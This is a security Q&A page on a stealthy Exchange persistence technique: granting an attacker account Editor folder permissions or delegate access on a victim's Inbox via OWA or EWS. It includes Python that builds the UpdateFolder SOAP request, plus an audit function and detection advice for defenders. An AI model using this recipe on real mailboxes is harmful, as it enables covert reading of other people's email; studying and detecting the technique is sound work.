One Day Sec

What is a less detectable method to continuously read a target user's Exchange emails without modifying their mailbox rules?

Instead of creating forwarding rules, an attacker can grant their own account (user test2) delegate or folder-level permissions on test1's Inbox. This can be done in Outlook Web App (OWA) by assigning the "Editor" permission level on the folder, or programmatically with the EWS **AddDelegate** or **UpdateFolder** SOAP operations (the latter writes the folder:PermissionSet property). User test2 can then open test1's Inbox as a shared folder and read new mail as it arrives. One limitation: the access is to the folder contents only, so if test1 deletes a message, test2 can no longer read it. This approach is covered alongside others in the article Penetration Basics - Implementation of Exchange One-Liner Backdoor.
OWA, AddDelegate, UpdateFolder, permissions, persistent access, shared folder
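The UpdateFolder path described above, shown from both sides as an added example (this is not code from the original page or from the referenced article): one function builds the EWS SOAP envelope that sets the "Editor" permission level for test2 on test1's Inbox, and a second function audits a GetFolder response for any permission entry that is not at level None. The mailbox addresses, the "contoso.example" domain and the server response below are constructed for illustration; the element names and namespaces are the real EWS 2006 schema.

```python
"""Exchange Inbox folder-permission persistence, seen from both sides.

Added example for the delegate/folder-permission technique described above;
not code from the original page or the referenced article. Mailbox addresses,
the GetFolder response and the test1/test2 roles are constructed.
"""
import xml.etree.ElementTree as ET

NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)


def _q(prefix, tag):
    """Clark-notation tag name ({namespace}tag) for ElementTree."""
    return "{%s}%s" % (NS[prefix], tag)


def build_update_folder_request(victim_smtp, grantee_smtp, level="Editor"):
    """Build the EWS UpdateFolder SOAP envelope that writes folder:PermissionSet
    on the victim's Inbox with one Permission entry for the grantee.

    EWS writes the PermissionSet as a whole, so a real client would first
    GetFolder the current set and re-send it with this entry appended.
    """
    env = ET.Element(_q("s", "Envelope"))
    header = ET.SubElement(env, _q("s", "Header"))
    ET.SubElement(header, _q("t", "RequestServerVersion"), Version="Exchange2013")
    body = ET.SubElement(env, _q("s", "Body"))
    update = ET.SubElement(body, _q("m", "UpdateFolder"))
    change = ET.SubElement(ET.SubElement(update, _q("m", "FolderChanges")), _q("t", "FolderChange"))
    # Target the victim's well-known Inbox folder by distinguished id.
    dfid = ET.SubElement(change, _q("t", "DistinguishedFolderId"), Id="inbox")
    ET.SubElement(ET.SubElement(dfid, _q("t", "Mailbox")), _q("t", "EmailAddress")).text = victim_smtp
    # SetFolderField on folder:PermissionSet carries the new Permission entry.
    set_field = ET.SubElement(ET.SubElement(change, _q("t", "Updates")), _q("t", "SetFolderField"))
    ET.SubElement(set_field, _q("t", "FieldURI"), FieldURI="folder:PermissionSet")
    pset = ET.SubElement(ET.SubElement(set_field, _q("t", "Folder")), _q("t", "PermissionSet"))
    perm = ET.SubElement(ET.SubElement(pset, _q("t", "Permissions")), _q("t", "Permission"))
    ET.SubElement(ET.SubElement(perm, _q("t", "UserId")), _q("t", "PrimarySmtpAddress")).text = grantee_smtp
    ET.SubElement(perm, _q("t", "PermissionLevel")).text = level
    return ET.tostring(env, encoding="unicode")


def find_granted_permissions(get_folder_response_xml):
    """Audit a GetFolder response (or any EWS XML carrying Permission elements):
    return [(grantee, level)] for every entry whose level is not None.
    A clean Inbox has only Default and Anonymous at level None and returns []."""
    root = ET.fromstring(get_folder_response_xml)
    findings = []
    for perm in root.iter(_q("t", "Permission")):
        level = perm.findtext("t:PermissionLevel", default="", namespaces=NS)
        if level == "None":
            continue
        user = perm.find("t:UserId", NS)
        grantee = "?"
        if user is not None:
            # A Default/Anonymous entry above None is itself a finding.
            grantee = (user.findtext("t:DistinguishedUser", namespaces=NS)
                       or user.findtext("t:PrimarySmtpAddress", namespaces=NS)
                       or user.findtext("t:DisplayName", namespaces=NS) or "?")
        findings.append((grantee, level))
    return findings


# Constructed GetFolder response for test1's Inbox after the backdoor was set.
SAMPLE_GETFOLDER_RESPONSE = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
 <m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
                      xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <m:ResponseMessages><m:GetFolderResponseMessage ResponseClass="Success">
   <m:ResponseCode>NoError</m:ResponseCode>
   <m:Folders><t:Folder><t:DisplayName>Inbox</t:DisplayName>
    <t:PermissionSet><t:Permissions>
     <t:Permission><t:UserId><t:DistinguishedUser>Default</t:DistinguishedUser></t:UserId>
      <t:PermissionLevel>None</t:PermissionLevel></t:Permission>
     <t:Permission><t:UserId><t:DistinguishedUser>Anonymous</t:DistinguishedUser></t:UserId>
      <t:PermissionLevel>None</t:PermissionLevel></t:Permission>
     <t:Permission><t:UserId><t:PrimarySmtpAddress>test2@contoso.example</t:PrimarySmtpAddress>
       <t:DisplayName>test2</t:DisplayName></t:UserId>
      <t:PermissionLevel>Editor</t:PermissionLevel></t:Permission>
    </t:Permissions></t:PermissionSet>
   </t:Folder></m:Folders>
  </m:GetFolderResponseMessage></m:ResponseMessages>
 </m:GetFolderResponse>
</s:Body></s:Envelope>"""


if __name__ == "__main__":
    print(build_update_folder_request("test1@contoso.example", "test2@contoso.example"))
    print(find_granted_permissions(SAMPLE_GETFOLDER_RESPONSE))
```

The audit half is the check a defender would run: on the server side the same information comes from the Exchange Management Shell cmdlet Get-MailboxFolderPermission (for example against test1:\Inbox), and where mailbox auditing is enabled, folder permission changes are recorded as mailbox audit events, so this backdoor is quieter than a forwarding rule but not invisible.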
